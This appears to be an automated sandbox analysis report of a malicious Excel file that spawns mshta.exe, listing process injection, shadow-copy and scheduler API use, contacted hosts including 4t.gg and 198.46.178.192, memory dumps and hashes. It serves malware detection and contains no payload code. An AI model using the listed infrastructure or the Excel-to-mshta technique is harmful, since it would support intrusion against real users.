| Description | Indicator | Process | Target |
| PID 4528 wrote to memory of 4236 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 4528 wrote to memory of 4236 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r10.o.lencr.org | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| US | 8.8.8.8:53 | 133.204.146.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.178.46.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/4528-0-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-1-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp
memory/4528-3-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-2-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-5-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-4-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-7-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-6-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-8-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-10-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-11-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-12-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp
memory/4528-9-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-13-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp
memory/4528-14-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-17-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-18-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-20-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-19-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-16-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-15-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-38-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-42-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-45-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-46-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp
memory/4528-47-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-51-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-52-0x00007FF7321D0000-0x00007FF7321D8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 1db43076453e25110d16a8013d558fe4 |
| SHA1 | 20ad8372357cfa65ae3bcc38f448394c6c24d966 |
| SHA256 | 3e973311136c5bbed135265e2facc151547b9424856a31698c2b9bfb73a571b5 |
| SHA512 | 5e15a6d91c6a175cc92e5ceac2c98277df674aac82f7cdf1c6d9222f945044b00666bb1efd6485384efc1791bad09086f178baf76c7096d7cc9bb9b5df150355 |